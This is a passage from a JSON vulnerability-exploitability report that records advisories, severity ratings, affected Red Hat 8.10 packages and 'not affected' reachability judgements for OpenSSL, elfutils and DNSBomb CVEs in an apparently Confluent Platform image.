          "url": "https://ubuntu.com/security/notices/USN-6937-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20240408.txt"
        },
        {
          "url": "https://www.openssl.org/news/vulnerabilities.html"
        }
      ],
      "published": "2024-04-08T14:15:07+00:00",
      "updated": "2026-06-17T07:24:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-25260",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-25260"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-25260"
        },
        {
          "url": "https://github.com/schsiung/fuzzer_issues/issues/1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058"
        },
        {
          "url": "https://sourceware.org/elfutils/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
        }
      ],
      "published": "2024-02-20T18:15:52+00:00",
      "updated": "2026-06-17T07:15:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.190-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.190-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.190-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-33655",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400
      ],
      "description": "The DNS protocol in RFC 1035 and updates allows remote attackers to cause a denial of service (resource consumption) by arranging for DNS queries to be accumulated for seconds, such that responses are later sent in a pulsing burst (which can be considered traffic amplification in some cases), aka the \"DNSBomb\" issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-33655"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18556"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18931"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-33655"
        },
        {
          "url": "https://alas.aws.amazon.com/ALAS-2024-1934.html"
        },
        {
          "url": "https://bugzilla.redhat.com/2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/2405706"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2405706"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33655"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11411"
        },
        {
          "url": "https://datatracker.ietf.org/doc/html/rfc1035"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18556.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18931"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/commit/c3206f4568f60c486be6d165b1f2b5b254fea3de"
        },
        {
          "url": "https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md#version-120"
        },
        {
          "url": "https://gitlab.isc.org/isc-projects/bind9/-/issues/4398"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-33655.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18931.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00019.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3TBXPRJ2Q235YUZKYDRWOSYNDFBJQWJ3/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QITY2QBX2OCBTZIXD2A5ES62STFIA4AL/"
        },
        {
          "url": "https://meterpreter.org/researchers-uncover-dnsbomb-a-new-pdos-attack-exploiting-legitimate-dns-features/"
        },
        {
          "url": "https://nlnetlabs.nl/downloads/unbound/CVE-2024-33655.txt"
        },
        {
          "url": "https://nlnetlabs.nl/projects/unbound/security-advisories/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33655"
        },
        {
          "url": "https://sp2024.ieee-security.org/accepted-papers.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6791-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-33655"
        },
        {
          "url": "https://www.isc.org/blogs/2024-dnsbomb/"
        },
        {
          "url": "https://www.nlnetlabs.nl/news/2024/May/08/unbound-1.20.0-released/"
        }
      ],
      "published": "2024-06-06T17:15:51+00:00",
      "updated": "2026-06-17T07:32:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
